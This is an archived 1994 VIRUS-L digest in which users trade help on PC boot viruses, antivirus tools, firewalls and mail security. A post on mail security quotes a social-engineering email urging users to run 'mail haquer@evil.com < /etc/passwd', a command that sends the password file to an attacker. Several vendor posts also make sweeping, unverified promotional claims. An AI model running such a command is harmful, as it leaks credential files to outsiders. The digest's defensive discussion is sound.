VIRUS-L Digest   Tuesday, 1 Nov 1994   Volume 7 : Issue 90

Today's Topics:

Internet Staging
Re: Distribution of Viruses
Re: Common Virus Sources
Re: Netcom distributing Viruses
Re: Mail Security
Re: UNIX virus detection (UNIX)
Re: UNIX virus detection (UNIX)
Anti-CMOS Virus Infection - HELP! (PC)
Re: Help: Stuck with [GenP] virus (PC)
Anti-CMOS A solution... (PC)
Re: F-Prot under WinZip (PC)
Promise DC200 IDE caching card problems(?) / Virus? (PC)
what's the story with InVircible? (PC)
Re: Monkey Virus is on our backs... (PC)
F-prot freezes system. (PC)
re: scitzo attack (PC)
Re: Help with FORM (PC)
Re: Help with possible virus (PC)
Re: KOH encrypting disks (PC)
Re: Monkey Virus is on our backs... (PC)
Re: Looking for Dr. Solomon upgrade (PC)
Re: Stealt_boot.C (PC)
KOH Problem (PC)
Firmware Virus Protection System For Networks (PC)
Re: Stealt_boot.C (PC)
WHISPER.FF - What does it do? (PC)
386-specific viruses (PC)
Date Stamp (PC)
New virus! "GV" (PC)
Anti-CMOS infection - HELP! HELP! (PC)
Where is the new version of FSHIELD? (PC)
Re: ubuythis.now (PC)
Re: Can a master boot record be repaired? (PC)
Microsoft Anti-Virus updates (PC)
re:JUNKIE VIRUS (PC)
Re: Central Point Update? ---- FTP site? (PC)
Re: invb601.zip - The InVircible Anti-Virus Expert System v6.01 (PC)
Re: Need Help with Stoned Virus (PC)
Re: Can a virus change CMOS settings??? (PC)
Mc Afee validate: still used though USELESS! (PC)
HELP! ANTICMOS virus (PC)
Viruses & TSRs (PC)
tbav - Thunderbyte anti-virus v6.26 (Complete/Windows/Optimized) (PC)
i_m231b.zip - IntegrityMaster 2.31b antivirus/data integrity (PC)
Sabotage, Pranks & Surveillance Survey

VIRUS-L is a moderated, digested mail forum for discussing computer virus issues; comp.virus is a gatewayed and non-digested USENET counterpart. Discussions are not limited to any one hardware/software platform - diversity is welcomed. Contributions should be relevant, concise, polite, etc.
(The complete set of posting guidelines is available by FTP on CORSA.UCR.EDU (IP number 138.23.166.133) or upon request.) Please sign submissions with your real name; anonymous postings will not be accepted. Information on accessing anti-virus, documentation, and back-issue archives is distributed periodically on the list. A FAQ (Frequently Asked Questions) document and all of the back-issues are available by anonymous FTP on CORSA.UCR.EDU.

Administrative mail (e.g., comments, suggestions, beer recipes) should be sent to me at: krvw@ASSIST.MIL.

All submissions should be sent to: VIRUS-L@Lehigh.edu.

   Ken van Wyk

----------------------------------------------------------------------

Date: Mon, 24 Oct 94 13:29:15 -0400
From: aisg@gate.net (Advanced Information Systems Group)
Subject: Internet Staging

Is there any software available to scan for viruses as they come into an Internet gateway machine? I'm looking for a product that scans all data coming in from the Internet before it is sent on to the destination within my internal network. Initially my concern is with E-mail messages that may have viruses in them.

Any help would be appreciated.

John Klann
AISG
1-800-780-2598
klann@advinfo.com

------------------------------

Date: Tue, 25 Oct 94 18:40:53 -0400
From: hw41652@is1e.bfu.vub.ac.be (Van Deun Dirk)
Subject: Re: Distribution of Viruses

jmccarty@spd.dsccc.com (Mike McCarty) writes:

>I also believe, however, that there is a
>certain "mystique" in writing viruses. (...)
>But it does indicate that some people believe that writing
>a virus is somehow "different" from writing any other program.

It is. Writing a virus is a kind of test of your knowledge of the operating system, of the arcana of your computer. But I believe that the people who consider writing viruses an intellectual challenge and the people who spread viruses are not (always) the same.
After all, most viruses seem to be programmed as slight variations on other ones, not from scratch, as a real 'hacker' (in the nice sense of the word) would do. If programming languages came packed with 'virus libraries', functions to make virus programming easy, like there are TSR libraries, the first group would lose interest -- their knowledge is no longer arcane. I do not know about the second group however: they seem to be happy if there is a virus around that a) writes their nom-de-plume in all bootsectors b) carries their political message c) destroys stuff in their name.

------------------------------------------------------------------------------
Dirk van Deun hw41652@vub.ac.be
------------------------------------------------------------------------------

------------------------------

Date: Tue, 25 Oct 94 21:58:41 -0400
From: craigewert@delphi.com
Subject: Re: Common Virus Sources

Marty -

While I cannot give you much, I will mention that my employer has had 2 recent (last month) infections from shrink-wrapped disks. Both times came from using pre-formatted disks without software, carrying (obviously) boot-sector viruses (virii?).

I have been using Internet for about 13 months, and have never had a virus (at least, f-prot can't find any, and nothing bad has happened of which I am aware).

Craig Ewert

------------------------------

Date: Wed, 26 Oct 94 09:31:24 -0400
From: "The Radio Gnome"
Subject: Re: Netcom distributing Viruses

>Date: Fri, 14 Oct 94 23:52:03 -0400
>From: olpopeye@ix.netcom.com (Walter Murdock)
>Subject: re: Netcom Distributing Viruses

>I guess next I'll read "You can have my computer when you
>pry it from my cold, repetitive-strain-riddled hands."

Don't you mean 'net access'? :-)

>Come on, people! Netcom isn't infecting your computers.

No, but potentially abusive Netcom subscribers can write new viruses that will.

>And guns aren't dangerous. Unless you do something stupid
>with them.

Neither are idle viruses.
What guarantee can Netcom give us that any downloadable viruses will *remain* idle and unmutated?

>Get real! Let's try and keep this discussion on a more
>intelligent level. And try to pick an analogy that deals
>with reality, not some knee-jerk anti-gun propaganda.

OK, I'll try a new tack... how would you feel if Netcom made all the long distance touch tone diagnostic, technician and 'coin drop' codes available? The phone providers have enough trouble with phreakers as is, why make it more difficult for them by spreading knowledge that may be interesting, but potentially dangerous?

Andy Wing (CNE) - Temple University Computer Services
"A fool and his net access soon go their separate ways"

------------------------------

Date: Thu, 27 Oct 94 01:20:09 -0400
From: john@pc.xs4all.nl (Jan-Pieter Cornet)
Subject: Re: Mail Security

aisg@gate.net (Advanced Information Systems Group) once said:

> from the internet to insure there are no viruses. Take SMTP mail for example,
> is there a secure sendmail or staging software that checks for viruses before
> forwarding it on to the recipient?
> Are mail based viruses still a threat to a company connecting up to
> the internet? Any advice you have would be much appreciated.

Firewall packages probably come bundled with a specialised SMTP daemon that is able to filter out a few "nasties" from mail headers (like saying "From: /etc/passwd" and stuff like that).

A much bigger threat, however, are incoming mails that simply say: ``hi! Would you be so kind as to help me out with something? If you could just type "mail haquer@evil.com < /etc/passwd" at the prompt, I'd be very grateful. Thanks.'' (This has happened not less than a week ago (as I write this, we oct 26). Read about it on comp.security.unix).
Another mail problem, and this one actually is a virus, is the CHRISTMA or XMAS virus that probably will have another high soon on a certain type of network (I forgot whether it's VMS or IBM VM machines, anyway another true story). This "virus" consists of a script that does something nice to your terminal (display a christmas tree or something), while it mails itself to all people listed in your mail aliases file or whatever it's called on VM.

You might be able to hook "grep" into the firewall to check for this particular type of mail-virus, but a much better solution is of course to educate the users. Educating your users isn't a bad idea anyway, since it can prevent your company from getting a bad image because the users are in serious needs of some clues, and showing that, too, on usenet (just look at aol.com :)

Hope this helps,

=====BEGIN FRACTAL-COMPRESSED SIGNATURE=====
| Jan-Pieter Cornet !PGP0XA4E77CCB/KVC=1FCBE41048A009550F68867928EB8DDF |
=====END FRACTAL-COMPRESSED SIGNATURE===== ;-)
My v2.6 decompressor (out soon!) will expand this to a 72 minutes MPEG movie!

------------------------------

Date: Tue, 25 Oct 94 12:52:24 -0400
From: radatti@cyber.com (Pete Radatti)
Subject: Re: UNIX virus detection (UNIX)

> From: rickr@scripps.edu (Rick Ross)
>
> Folks,
> Greetings. I am new to the list and am risking asking something that may
> have been asked recently. The question is: Is anyone aware of any antivirus
> software that has been developed for Unix workstations? My company is
> connecting to the Internet and there is concern about importing viruses to
> Unix workstations. How do other folks take precautions?

Yes, there is a virus scanner for Unix called VFind. Also you should take very basic steps like installing a firewall prior to purchasing a virus scanner. Consider a virus scanner something that helps you deal with an attack and a firewall something that makes attacks much harder to do.
That is not to say that a virus scanner can not be a valuable part of a firewall. I say this since you stated that you are connecting to the Internet and are concerned. Attacks over the Internet tend to be human directed more often than autonomous.

Pete Radatti
radatti@cyber.com
CyberSoft, Inc. (Manufacturer of VFind)

------------------------------

Date: Tue, 25 Oct 94 15:37:37 -0400
From: jfl@hobbes.cca.rockwell.com (Joe Lawrence)
Subject: Re: UNIX virus detection (UNIX)

rickr@scripps.edu (Rick Ross) says:

> Greetings. I am new to the list and am risking asking something that may
>have been asked recently. The question is: Is anyone aware of any antivirus
>software that has been developed for Unix workstations? My company is
>connecting to the Internet and there is concern about importing viruses to
>Unix workstations. How do other folks take precautions?

Viruses probably *won't* be your major concern when you connect to the Internet. Network penetration by uninvited "guests" will. You should investigate the use of a network firewall. Firewalls are special programs that run on gateway machines (Unix boxes or PCs) that connect between the internet and your site and block out unwanted intrusions. Most allow access out but none in. You should also invest in some books and research on internet security.

There are a few (maybe three or four) true Unix viruses. Tools like Tripwire will help detect them, however, the best insurance is a dedicated, knowledgeable workstation administrator.

Joe Lawrence                 |"All opinions are mine, not Rockwell's"
Engineering Support Services | To do is to be - Nietzsche
Rockwell International       | To be is to do - Sartre
jfl@hobbes.cca.rockwell.com  | Do be do be do - Sinatra

------------------------------

Date: Mon, 24 Oct 94 14:06:44 -0400
From: hiwire@solomon.technet.sg (Lim Beng Cheng)
Subject: Anti-CMOS Virus Infection - HELP! (PC)

If you want to protect yourself against boot viruses of any kind, why not try FrontLine.
This program complements your existing anti-virus software and FrontLine can detect and remove any boot virus - past, present and future. If you want more info, please drop me an email or drop a message in this newsgroup.

FrontLine is currently the most reliable software to deal with boot viruses.

--
Lim Beng Cheng
Hiwire Computer & Security Pte Ltd
hiwire@solomon.technet.sg

------------------------------

Date: Mon, 24 Oct 94 14:19:49 -0400
From: hiwire@solomon.technet.sg (Lim Beng Cheng)
Subject: Re: Help: Stuck with [GenP] virus (PC)

: My PC seems to have been stuck with some [GenP] virus (as reported by
: the Anti-virus program). I removed the virus (at least the Anti-virus
: program told me so), but looks like the FAT is in damaged condition.

If you want to forget about the threat from boot virus, just install FrontLine. FrontLine is your first line of defence against boot viruses - past, present and future. When installed in your hard disk, it will detect and disinfect any virus - including stealth and polymorphic boot viruses. It complements your existing anti-virus software and saves your investment.

: The problem is like this - let say I have a directory XYZ. I have copy
: of my root directory under XYZ. Hence, I seem to have recursive directory
: structure like:

Just use any utilities such as Norton and change the attribute of XYZ from a directory to a file ie by removing the dir attribute.

By the way, if you are in Singapore, we are conducting a virus seminar this 28 Oct 94. If you are interested, please call me at Tel: 5527328.

Lim Beng Cheng
Hiwire Computer & Security Pte Ltd
hiwire@solomon.technet.sg

------------------------------

Date: Mon, 24 Oct 94 14:23:09 -0400
From: gnguyen@uclink2.berkeley.edu (George Nguyen)
Subject: Anti-CMOS A solution... (PC)

By a very idiotic and foolish accident I contracted the Anti-CMOS A virus onto my hard drive's master boot record.
It was interesting to see that SCANV117 reports it as a GenB virus, SCAN 2.1.211 finds a GenP virus, and SCAN 2.1.212 finds the actual Anti-CMOS A. Right away, I wrote down my CMOS settings.

Anyway, I remembered that the Linux HOW-TO FAQ for installing had some info about repartitioning without losing data, and I thought that might remove the MBR virus by recreating the MBR from scratch. But there was also a little blurb about an undocumented feature in DOS's FDISK utility. If FDISK is run with parameter /MBR, then the master boot record of the drive is rewritten and recreated.

After I took a chance and ran this, my hard drive doesn't seem to be infected anymore, and all my data is intact, so far. The Anti-CMOS A virus seems to be gone now, and I've learned for myself of FDISK's little hidden feature. This seems to have a lot of potential. Does anyone else have any info on what else is not documented about FDISK's capabilities?

George Nguyen

------------------------------

Date: Mon, 24 Oct 94 15:48:49 -0400
From: rc.casas@ix.netcom.com (Robert Casas)
Subject: Re: F-Prot under WinZip (PC)

mike.murphy@atlwin.com (Mike Murphy) writes:

>
>I need some help with F-Prot v2.14 (or any version for that matter). I
>use Windows religiously and would rather not go to DOS (although I know
>DOS and have used it since 1986). I use a ShareWare called WinZip v5.5
>(which I highly recommend!!) to test downloaded files.
>I would rather use F-Prot to do the virus scanning in Iconized
>background (not visible as a DOS session).
>The problem comes with the report. When F-Prot is finished scanning,
>WinZip brings up the report. There is no information.
>I have read over the command switches and nothing seems to fit into that
>category.
>This is different with McAfee, which offers a complete and detailed
>report using these switches: /nomem *.*/all/sub
>To all the F-Prot gurus (Fridrik Skulason?)...PLEASE help...I would
>rather use F-Prot than McAfee any day.
The answer is so obvious that it is easy to overlook. Look in your WINZIP directory. You will see a WZ.PIF file. Open this file in windows' PIF EDITOR and de-select the "Close window on exit" box in the lower left corner of the main edit screen. Now, when you run F-PROT - or any other DOS based scanner from WINZIP - the DOS WINDOW will not automatically close when the program has completed execution. To close the DOS WINDOW hit ALT + ENTER, then "C", or use your mouse.

Some more people should ask Niko to build support for F-PROT and TBAV into WINZIP.

------------------------------

Date: Mon, 24 Oct 94 21:41:58 +0000
From: stech@eskimo.com (Harvey Steck)
Subject: Promise DC200 IDE caching card problems(?) / Virus? (PC)

Anyone had problems with the Promise DC-200 caching card? I am suspicious that this card has recently started garbling apparently randomly picked filenames, but it does not affect the contents of the files(!). It is always the third character of the filename that is changed, and it is always changed by subtracting 40h from its ASCII value.

Does anyone know of a virus that does this? If so, please let me know! (SCAN v117 doesn't detect it.)

please send copy of reply via e-mail to: stech@eskimo.com (Harvey Steck)

------------------------------

Date: Mon, 24 Oct 94 21:23:58 -0400
From: 925741@brt.deakin.edu.au
Subject: what's the story with InVircible? (PC)

Greetings,

I just received a flyer from a distributor of the InVircible product, unremarkable except for their enthusiasm to say things such as:

"Every other product is redundant"
"..other CRC integrity checkers aren't even worth a thought"
and "no virus has evaded detection by InVircible in four years!"

Well should I currently stop using AVTK and start using this package 'authored by a specialist in electronic warfare from the Israeli Airforce'?

I humbly await informed comments.
------------------------------

Date: Mon, 24 Oct 94 21:53:25 -0400
From: michael mccright
Subject: Re: Monkey Virus is on our backs... (PC)

Just heard of the monkey virus from a friend--detected in philly and has moved to s.c. Virus has been cleaned using updated virus detector. Does anyone have any damage reports from this virus?

------------------------------

Date: Tue, 25 Oct 94 00:47:41 -0400
From: Joshua Proschan <0004839378@mcimail.com>
Subject: F-prot freezes system. (PC)

I encountered a strange problem with f-prot 2.14: When I first got it, it worked without problems. Then I upgraded my system from Windows 3.11 to Windows for Workgroups 3.11, and swapped the ISA 486 motherboard for a new VL/B board (going from AMI v1 to v2.02). Now when I try to run f-prot it freezes the system, either without starting (3 times), or after the blue screen appears but before starting the check of memory (twice), or when starting to check the boot sector on D:

Aside from Windows, the system runs DOS 6.20, QEMM 7.04, and Stacker 4.0. SCANV117 reports no viruses on the system, and VIRSTOP has never put out an alarm. I haven't found any other software that was affected by the change in hardware & Windows. I tried Zvi Netiv's suggestions for identifying Goldbug, and found no problems.

Are there any other viruses that could be causing this problem? Any other suggestions?

Joshua Proschan
jproschan@mcimail.com

------------------------------

Date: Tue, 25 Oct 94 10:09:07 -0400
From: "David M. Chess"
Subject: re: scitzo attack (PC)

> From: denat@guid2.dnet.ge.com

> I have just suffered an attack by the 'scitzo' virus.
> found traces of it in several files which were not executables.

Source code for a virus like the one you described has been floating around in virus-writing circles. Every time a file is opened that has an extension *other than* COM or EXE, there is a roughly 1/100 chance that the virus will append that "scitzo" text to the end.
The virus infects files with COM and EXE extensions that are opened, and any files that are executed. It sets the seconds fields of timestamps to 3, as you noticed, to mark infected files. The actual source code (the version that I have seen, anyway) has a rather severe bug that keeps many/most offspring from running, but it appears that at least one person has fixed the bug and released a working version on the world...

DC

------------------------------

Date: Tue, 25 Oct 94 10:28:40 -0400
From: rreymond@VNET.IBM.COM
Subject: Re: Help with FORM (PC)

Hi all,

Michael Paget wrote:

> An acquaintance of mine is currently tracking down an infection of the
>FORM virus in the computer system of a large corporation. We have
>successfully removed it several times, but re-infection continues on an
>irregular basis.

Sigh... as perhaps you yet know, FORM is a boot sector infector; that means that the only way you have to got the vir is to boot from an infected diskette. If you have removed the virus several times, and still the infection returns time by time, this is due to someone at your site that still uses infected diskette, and that sometimes forget one into A: drive, so that when rebooting s/he again infect the PC, and then all the diskette s/he uses...

After the Hard Disk cleaning, you must do a broad diskette-hunt...

.......................................=8-)..Bye!
..................................................Roberto

-----------------------------------------------------------------------
* All the above are my own opinions, not necessarily shared by IBM *
***********************************************************************
Roberto Reymond IBM PSP - Computer Emergency Response Team Italy
RREYMOND@VNET.IBM.COM Circonvall. Idroscalo
RREYMOND at VNET --- * --- 20090 Segrate (MI)
ITIBM99K@IBMMAIL.COM MI SEG 526 ITALY
.........Phone +39.2.596.25244 Fax +39.2.596.29587..............
***********************************************************************
* " Another one bites the dust! " , Queen (The Game, 1980) *
***********************************************************************

------------------------------

Date: Tue, 25 Oct 94 10:46:35 -0400
From: rreymond@VNET.IBM.COM
Subject: Re: Help with possible virus (PC)

Hi,

"Sean D. Canady (USF)" wrote:

>I messed up and rebooted my computer with a disk in the floppy and it
>gave me the Forms Virus...I got rid of it using Norton Anti Virus, but
>now when I try to run Windows for Workgroups 3.11 it tells me that it
>can't find the driver for 32bit access. And it says (i think this is
>right) the interrupt it uses to call my hard drive is not the same. It
>then tells me to check to make sure I don't have any viruses. I have
>checked my entire hard drive and it doesn't come up with anything.
>Also I am running Stacker 4.0, could this be part of the problem?

I'm not sure, but I think may be. FORM is a boot sector virus, that means that it gain the PC control when loaded and executed, the first time from an infected floppy. But, since you have Stacker installed, at that time there was the hard disk (C:) seen as physical, not logical....

I try to better explain: when working with stacker, you see a *big* C: drive, nearly the double of your physical drive. That's in reality a huge hidden file, that Stacker points as C: drive, while the rest of your hard disk is seen as another drive letter, let's say D:. At boot time, Stacker drives aren't yet loaded and operative, so there's nothing that can see this big file as a hard disk, in fact it isn't. So, FORM goes and write itself in boot sector, and the rest of the body, plus the original boot sect in the two last clusters of the disk.

I don't know what FORM can do versus Stacker 4.0, in writing on the boot sector, but if the disk is quite filled, it's easy that, copying the boot sec. and its 'tail', there may be some data loss...
........................................=8-)..Bye!
..................................................Roberto

-----------------------------------------------------------------------
* All the above are my own opinions, not necessarily shared by IBM *
***********************************************************************
Roberto Reymond IBM PSP - Computer Emergency Response Team Italy
RREYMOND@VNET.IBM.COM Circonvall. Idroscalo
RREYMOND at VNET --- * --- 20090 Segrate (MI)
ITIBM99K@IBMMAIL.COM MI SEG 526 ITALY
.........Phone +39.2.596.25244 Fax +39.2.596.29587..............
***********************************************************************
* " Another one bites the dust! " , Queen (The Game, 1980) *
***********************************************************************

------------------------------

Date: Tue, 25 Oct 94 11:03:19 -0400
From: rreymond@VNET.IBM.COM
Subject: Re: KOH encrypting disks (PC)

Hi,

about virus KOH, ANTHONY APPLEYARD wrote:

> If it encrypts my hard disk, or does anything else to my PC, without my
>permission, it ain't useful!!! If I want an encrypter, I'll buy or write an
>encrypter of the ordinary non-viral type!

I agree. But, to tell the truth, KOH waits for your permission. At least, the version (1.01... or 1.1?) I've seen a while ago. The only prob I found in it was that, after being installed on a hard disk, it automatically infect every floppy used, as default. You have to switch off this with proper command.

.......................................=8-)..Bye!
..................................................Roberto

-----------------------------------------------------------------------
* All the above are my own opinions, not necessarily shared by IBM *
***********************************************************************
Roberto Reymond IBM PSP - Computer Emergency Response Team Italy
RREYMOND@VNET.IBM.COM Circonvall. Idroscalo
RREYMOND at VNET --- * --- 20090 Segrate (MI)
ITIBM99K@IBMMAIL.COM MI SEG 526 ITALY
.........Phone +39.2.596.25244 Fax +39.2.596.29587..............
***********************************************************************
* " Another one bites the dust! " , Queen (The Game, 1980) *
***********************************************************************

------------------------------

Date: Tue, 25 Oct 94 12:53:17 -0400
From: hiwire@solomon.technet.sg (Lim Beng Cheng)
Subject: Re: Monkey Virus is on our backs... (PC)

: We have an infestation of Monkey around our campus. It is
: cropping up on all sorts of systems in different disciplines.
: Have used McAfee to clean the virus successfully on a network,
: but the virus seems to be very persistent on stand-alone
: systems.

Monkey virus is a stealth boot virus which infects the partition record of the hard disk. It does not infect files in the network. I wonder what you mean that you have cleaned the virus on a network.

: We ran the cleaner and the virus was removed from one system,
: but then I decided to run a check using NU8, diskedit on the
: virus signature. The signature was still present on the hard

You cannot remove the virus by booting up from the hard disk because it is a stealth version. You will also not be able to see the virus using any utilities.

However, I have written a program called FRONTLINE. It is specifically designed to detect and remove boot virus of any kind, including stealth and polymorphic boot viruses - past, present and future. There is no need to update FRONTLINE because it is a generic virus detector. Just install into your hard disk and you can totally forget about the threat of boot viruses. The moment you switch on your PC and boot up from the hard disk, if there is a boot virus, it will be detected and removed automatically. The user just has to type Y in response to "Remove suspected boot virus (Y/N)?".
FRONTLINE is the most reliable software solution to your boot viruses problem - don't even need a system disk to recover from an infection. Moreover, it saves your investment in your existing anti-virus software. FRONTLINE complements your anti-virus software.

Please email me for details if you are interested to test it out.

Lim Beng Cheng
Hiwire Computer & Security Pte Ltd
hiwire@solomon.technet.sg

------------------------------

Date: Tue, 25 Oct 94 16:34:56 -0400
From: gcluley@sands.co.uk
Subject: Re: Looking for Dr. Solomon upgrade (PC)

bfbrown@teal.csn.org (Brian Brown) wrote:

>In its on-line-help, Dr. Solomon's indicates upgrades are available
>via a bulletin board. Does such a board or FTP site exist? Can
>someone point me in the right direction?

S&S International in the UK operate a BBS: +44 (0)1296 318810. We are also planning to set up a Compuserve forum in the near future.

But, you will need to upgrade the executable files (eg. the scanning engine, FINDVIRU.EXE) as well as the driver files. The engine periodically changes to cope with new virus developments. To give you an indication how things have moved on since your last update 11 months ago, we are now detecting in excess of 5100 viruses, trojans and variants.

To upgrade the engine you will probably need to resubscribe. If you're based in the States a good point of contact for you is:

S&S International
26315 Naccome Drive
Mission Viejo
CA 92691
USA

Tel: 714 470 0048
Fax: 714 470 0018
email: 72714.2252@compuserve.com
Compuserve: 72714,2252

>Email responses to brian@t1sys.com are appreciated

I have also sent you this by email.
Regards,
Graham

---
Graham Cluley [gcluley@sands.co.uk]   S&S International PLC
Product Specialist                    Alton House, Gatehouse Way
Dr Solomon's Anti-Virus Toolkit       Aylesbury, Bucks HP19 3XU
Tel: +44 (0)1296 318700               United Kingdom

------------------------------

Date: Tue, 25 Oct 94 17:48:20 -0400
From: bhayes@unl.edu
Subject: Re: Stealt_boot.C (PC)

A department here just reported a Stealth_boot.C infestation. It was detected initially with an IBM anti-virus product and F-PROT 2.14. I've not been able to find any information about this virus through F-PROT's virus listings.

Can anyone tell me more about the virus?

BTW, I've been trying for ages to find a good virus database. I have older listings of the Computer Virus Catalog indices, but I've had bad luck in trying to download an update from ftp.infomratik.hamburg.de. Are there other sites for this valuable set of indices? If not, what other databases are really good? I do know there's a hypertext one that's supposed to be awful.

Bill Hayes, ICCS Computer Labs Supervisor, University of Nebraska - Lincoln, Lincoln NE 68583
bhayes@unl.edu, ianr012@unlvm.unl.edu

------------------------------

Date: Tue, 25 Oct 94 22:50:19 -0400
From: Pietro
Subject: KOH Problem (PC)

I have a small problem--at school, someone installed KOH on a library computer, claiming it to be the "ultimate" encryption program (he was encrypting the harddrive because students were messing around with it and causing a lot of problems). However, something happened (what, I'm not exactly sure) and KOH will not let the computer boot up properly. The computer says "Enter Passphrase", and after we do, it says "Loading MS-DOS" (everything normal so far). After that, however, it says there's an error reading the harddrive. So far, it's already encrypted 3 floppy disks (a teacher unknowingly used the computer) and there seems no way to get rid of KOH (short of re-formatting the C drive).

Is there any way to expunge KOH out of the system???
Pietro

------------------------------

Date: Tue, 25 Oct 94 23:58:45 -0400
From: emd@access.digex.net (EMD Enterprises)
Subject: Firmware Virus Protection System For Networks (PC)

--ROMArmor Provides Seamless Anti-Virus Protection--

Towson, MD, October 17, 1994 -- EMD Enterprises announces its new line of anti-virus Firmware product called ROMArmor. ROMArmor is an 8k ROM chip that plugs into existing boot PROM sockets on network interface cards. ROMArmor's heuristic algorithm detects the presence of a virus based on its behavior and thus it can protect the system against known and unknown boot viruses. All boot viruses that are known are identified at the time of detection and the user is presented with options for either halting the boot process or repairing the boot sector.

Currently EMD Enterprises is working with Ethernet adapter vendors that will begin shipping ROMArmor enabled products. ROMArmor comes with free access to the EMD Enterprises Windows BBS, 3 year limited warranty, 1 year free technical support and a 1 year subscription to the EMD System Care virus update service.

How ROMArmor Prevents And Eliminates Boot Viruses

ROMArmor prevents the most feared of computer viruses, the boot virus. ROMArmor prevents infection by installing itself as an extended BIOS before the system accesses the boot and master boot record (MBR) of the system disk. With ROMArmor activated in the system, the presence of any boot viruses hiding within the MBR and boot sector will be detected.

Because boot viruses are difficult to detect and prevent, they are a large part of the reported virus infections. Boot viruses' most common method of entry is when the user accidentally boots the computer from an infected floppy disk or uses a floppy disk infected by one of the common boot viruses such as FORM, Stoned or Michelangelo.
ROMArmor detects these boot viruses and suspends the boot process thus allowing the user to remove the virus with additional utilities that are included with the ROMArmor package. ROMArmor incorporates special algorithms designed to reduce the occurrence of false alarms. ROMArmor is field upgradeable via software to incorporate new virus information. ROMArmor is constructed from an ordinary low cost ROM chip. By utilizing an ordinary ROM chip, EMD Enterprises eliminates the need for using expensive Flash ROM technology. ROMArmor is compatible with all IBM PC, AT, 386, 486, Pentium, or IBM compatible systems. ROMArmor is operating system independent, BIOS independent, disk independent, LAN independent, and MS-Windows aware.

For more information please contact
EMD Enterprises
606 Baltimore Ave., Suite 205
Towson, MD 21204, U.S.A.
Phone: (410) 583-1575 ext. 3020
FAX: (410) 583-1537
EMD FAX Back: (410) 583-1575 Ext. 4 Request Document # 1025
EMD Enterprises BBS: (410) 583-1537
CompuServe E-Mail: 70473,3260, Internet: emd@access.digex.net.

------------------------------

Date: Tue, 25 Oct 94 23:59:38 -0400
From: IANR012@UNLVM.UNL.EDU (Bill Hayes)
Subject: Re: Stealt_boot.C (PC)

yury@casbah.acns.nwu.edu (Yury Krongauz) writes:
>
>Hi,
>I had some diskettes diagnosed to have Stealt_boot.C by f-prot. I
>cleaned and reformatted all the diskettes except one, but the virus
>was not found on the hard drive (Using msav,f-prot).
>Could you please give me some advice of what steps I should take to
>make sure that everything is ok and hard drive is really clean.
>Also, I understood that it's a bsv virus. How does it work, and what
>are the symptoms - any help would be greatly appreciated.
>
> Yury Krongauz
>

We just saw Stealth_Boot.C for the first time. F-Prot 2.14 took it out. However, I haven't heard of this virus before. Can anyone provide info on it?

Also, are the virus catalogs from ftp.informatik.hamburg.de up to date? The MS-DOS indices I have are dated.
I've had trouble downloading from this site (I may have the address wrong in this message), as I always seem to time-out in the middle of a transfer. Are there any fast mirrors for this site and/or any other virus catalogs which are kept up-to-date?

Best wishes,
Bill...

- -----
Bill Hayes, Computer Labs Supervisor, IANR Communications & Computing Services
201 Miller Hall, University of Nebraska-Lincoln, Lincoln, NE 68583-0713
Internet: bhayes@unl.edu, ianr012@unlvm.unl.edu, CompuServe: 75140,2265
Fax: 402-472-6362, 402-472-5639, Voice: 402-472-0813, 402-472-5630

------------------------------

Date: Wed, 26 Oct 94 00:11:49 -0400
From: shoffman@iastate.edu (Scot A Hoffman)
Subject: WHISPER.FF - What does it do? (PC)

I just contracted WHISPER.FF and got rid of it with McAfee 212. Can someone tell me what it does? McAfee used to provide a text file with a chart of the viruses and what they did. Is this available anymore?

Scot

- --
Scot Hoffman
shoffman@iastate.edu

------------------------------

Date: Wed, 26 Oct 94 09:58:13 -0400
From: mw@spinfo.uni-koeln.de (Markus Wischerath)
Subject: 386-specific viruses (PC)

Hi there,

I'm looking for information on DOS-based viruses using 386 opcodes. AFAIK, there are at least two of them, Evolution and Argyle. I don't know if these two are related. Are there any others? Are they in the wild? Are they likely to become widespread at all, considering there's still a lot of =<286 machines around? Or do these viruses have a 16bit "kernel" so that they will spread on any machine, while the 32bit stuff is only used for maximum efficiency and additional tricks if a 386+ is present?

Any comments welcome.
- --
Markus Wischerath          mw@spinfo.uni-koeln.de     +49 221-470-4170
System Administrator                              Fax +49 221-470-5193
Linguistic Data Processing             University of Cologne, Germany
*300:c2 30 f4 ff 00 f4 c2 a9 a2 05 0f 22 00 00 e1 e2 30 60 n 300g

------------------------------

Date: Wed, 26 Oct 94 10:24:41 -0400
From: sean.doherty@channel1.com (Sean Doherty)
Subject: Date Stamp (PC)

I recently installed McAfee's Viruscan v2.1.1 onto our Novell network. I scanned all 3.5GB of our Netware v3.11 network and to my horror found that many of the date stamps on files ending in EXE, COM, BIN, DLL, SYS and OVL were changed by eight months! As you know, this is a major problem when trying to determine which version of a program you have. There was no way to find out which files had been changed and which had not.

We discovered the erroneous dates when files began listing creation dates of "00". By comparing these files with the copies on our recent backup tape I found that the files with months of "00" should really have had dates of "08". Since there was no way to determine which files had their date stamps changed and which were okay (besides comparing the dates of 3.5GB worth of files to the same files on a backup tape) I restored all of the files with these extensions.

I also scanned all of our workstations for viruses using the McAfee software (another copy), Norton Antivirus, and MS Antivirus (w/ MSDOS 6.20). I found no viruses.

It's been five days since I restored the files and stopped using Viruscan and all is well. I would like to begin using the McAfee software again, as I've had nothing but success until now. The command line I used was "SCAN F: G: /PLAD". I believe the /PLAD (Preserve Last Access Date) parameter screwed up the dates, but I'm only guessing.

Has anyone else had this problem? I've not seen any messages even similar. I would appreciate any responses (especially from McAfee). Many thanks to all who read this plea for help ...
:-(

Sean

------------------------------

Date: Wed, 26 Oct 94 12:45:24 -0400
From: rauh@ime.usp.br
Subject: New virus! "GV" (PC)

Hello,

I have been recently infected by a new local virus (I am from Brazil). This virus is spreading widely with no difficulty in the country since all anti-virus programs used here are foreign and do not detect this virus. The virus has infected so many computers that some newspaper articles have been published about it. As of this day I believe it hasn't left the country, and I know of no AV that detects/removes it.

Symptoms: A message like: Your computer is infected since . & ! GV - MG. appears on the screen at a seemingly random but very frequent period (about 2 lines per second) when some text program is run. It seems that there exist some variants with different names that are printed.

What is known:
- - It only prints its message on the 21st of October.
- - Infects the boot sector.
- - Can be disinfected by "fdisk /MBR".
- - When a computer is infected only about 4 programs may be loaded; trying to load more causes an EMM386 error (if not used it halts).
- - Windows will not run if DOS=UMB is present in config.sys.
- - It moves the original boot sector to another sector.

Bad news: When my computer was infected I used fdisk to remove it, but that destroyed the virus, so I have no copy of it at this day. BUT I was contacted by a friend who is infected and I will try to put it on a disk.

Name: Since it prints GV - MG and MG is a Brazilian state, and GV is the abbreviation of a city named "Governador Valadares", that's how it's being called here.

